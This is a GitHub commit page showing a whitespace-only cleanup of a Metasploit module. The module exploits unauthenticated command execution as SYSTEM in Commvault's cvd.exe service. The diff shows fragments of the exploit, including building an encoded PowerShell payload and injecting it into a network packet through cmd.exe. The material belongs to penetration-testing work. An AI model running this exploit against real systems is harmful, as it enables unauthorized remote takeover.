Skip to content

Commit 2b33b88

Browse files
committed
Damn spaces
1 parent e088c95 commit 2b33b88

File tree

1 file changed

+6
-6
lines changed

1 file changed

+6
-6
lines changed

modules/exploits/windows/misc/commvault_cmd_exec.rb

Lines changed: 6 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -18,8 +18,8 @@ def initialize(info={})
1818
discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5
1919
and v10). The vulnerability exists in the cvd.exe service and allows an
2020
attacker to execute arbitrary commands in the context of the service. By
21-
default, the Commvault Communications service installs and runs as SYSTEM in
22-
Windows and does not require authentication. This vulnerability was discovered
21+
default, the Commvault Communications service installs and runs as SYSTEM in
22+
Windows and does not require authentication. This vulnerability was discovered
2323
in the Windows version. The Linux version wasn't tested.
2424
},
2525
'License' => MSF_LICENSE,
@@ -48,7 +48,7 @@ def initialize(info={})
4848

4949
end
5050

51-
def exploit
51+
def exploit
5252

5353
buf = build_exploit
5454
print_status("Connecting to Commvault Communications Service.")
@@ -64,14 +64,14 @@ def exploit
6464

6565

6666
def build_exploit
67-
67+
6868
#Get encoded powershell of payload
6969
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection')
7070
#Remove additional cmd.exe call
7171
psh = "powershell"
7272
idx = command.index(psh)
7373
command = command[(idx)..-1]
74-
74+
7575
#Build packet
7676
cmd_path = 'C:\Windows\System32\cmd.exe'
7777
msg_type = 9
@@ -87,7 +87,7 @@ def build_exploit
8787
payload += '" && echo '
8888
payload += "\x00"
8989
payload += [zero].pack('I>')
90-
90+
9191
#Add length header and payload
9292
ret_data = [payload.length].pack('I>')
9393
ret_data += payload

0 commit comments

Comments
 (0)